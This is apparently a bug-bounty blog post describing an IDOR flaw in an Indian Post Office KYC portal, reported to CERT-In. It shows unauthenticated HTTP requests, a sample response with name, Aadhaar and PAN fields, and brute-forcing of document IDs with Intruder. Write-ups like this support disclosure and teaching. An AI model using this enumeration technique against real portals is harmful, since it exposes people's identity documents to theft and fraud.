
IDOR Nightmare: Indian Post Office Portal Exposed Thousands of KYC Records via Article ID, Username and Mobile Number


One of my Biggest Achievements in my Cyber Security Journey

IDOR in Indian Post Office Portal Leads to Critical Data Exposure

Insecure Direct Object References (IDOR) vulnerabilities continue to be a major security concern, and a recent discovery in the Indian Post Office portal highlights the severity of such flaws. This vulnerability exposed sensitive KYC details of users, allowing unauthorized access to critical personal data.

IDOR working

What Went Wrong?

Imagine being able to access thousands of people’s sensitive KYC data — Aadhaar numbers, PAN details, addresses, and phone numbers — just by tweaking a few numbers in a URL. Scary, right? That’s exactly what happened with the Indian Post Office portal, where a critical Insecure Direct Object References (IDOR) vulnerability left personal data wide open for exploitation.

Opening Laptop and Going to Browser (Felt Very Tired)

Digging Deeper with Request & Response

When I logged into the official Indian Government portal and started analyzing requests and responses, I noticed something unusual. While interacting with the target host, additional API calls were triggered in the background.

Below is the sample request that caught my eye:

REQUEST (Without Token)

GET /api/kyc/document?document_id=125678 HTTP/1.1
Host: govportal.in

RESPONSE

HTTP 200 OK

{
  "status": "success",
  "document_id": "125678",
  "user_id": "345678",
  "name": "Rahul Sharma",
  "aadhaar_number": "XXXX-XXXX-1234",
  "pan_number": "ABCDE1234F",
  "kyc_document": "https://govportal.in/kyc_docs/125678.pdf"
}

Request without Authorization Token

Digging Deeper with Other User’s Details

REQUEST

GET /kyc/get/100152 HTTP/2
Host: sample.gov.in
X-Request-Id: d3ec936b-e648-4795-97ad-81c8fd3e75dd
Sec-Ch-Ua-Platform: "Windows"
Request-Date: 2025-02-09T14:44:03.804+05:30
Accept: application/json, text/plain, */*
Sec-Ch-Ua: "Not(A:Brand";v="99", "Brave";v="133", "Chromium";v="133"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Sec-Gpc: 1
Accept-Language: en-US,en;q=0.7
Origin: https://samplegov.in
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://samplegov.in
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

RESPONSE

POC Image
Got Other User’s Details with PAN card and KYC Document

Now Let’s Brute Force the user ID with Intruder

Brute Forcing with ID

GET /api/kyc/document?document_id=****** HTTP/1.1
Host: govportal.in

What I Did Next (The Ethical Way)

Instead of ignoring it, I:
1. Reported the issue to the concerned authorities.
2. Explained the risks of leaving such files public.
3. Made sure they secured the file.

Why This is a Big Deal

When government-related platforms suffer from security issues, the impact is massive. Here’s what this breach could lead to:
1. Mass identity theft — Attackers can use leaked Aadhaar and PAN details for fraud.
2. Phishing & scams — With full personal info, scammers can craft ultra-convincing attacks.
3. Regulatory violations — Mishandling KYC data could bring serious legal trouble under Indian data protection laws.

Confirmation and Acceptance from CERT-In (Indian Cyber Incident Team)

Response from CERT-In

That’s it for now.

Cheers and peace out!

Want to know more about me? Read here.

Want to hack more? Follow below:

_.mr._domy >> Eat Well → Hack Well → Snack Well


Published in System Weakness

System Weakness is a publication that specialises in publishing upcoming writers in cybersecurity and ethical hacking space. Our security experts write to make the cyber universe more secure, one vulnerability at a time.

Written by Gokuleswaran B

Securing organizations with robust security solutions, proactive risk management. Let's protect our digital world together | Network, AD, Web App Pen-tester |
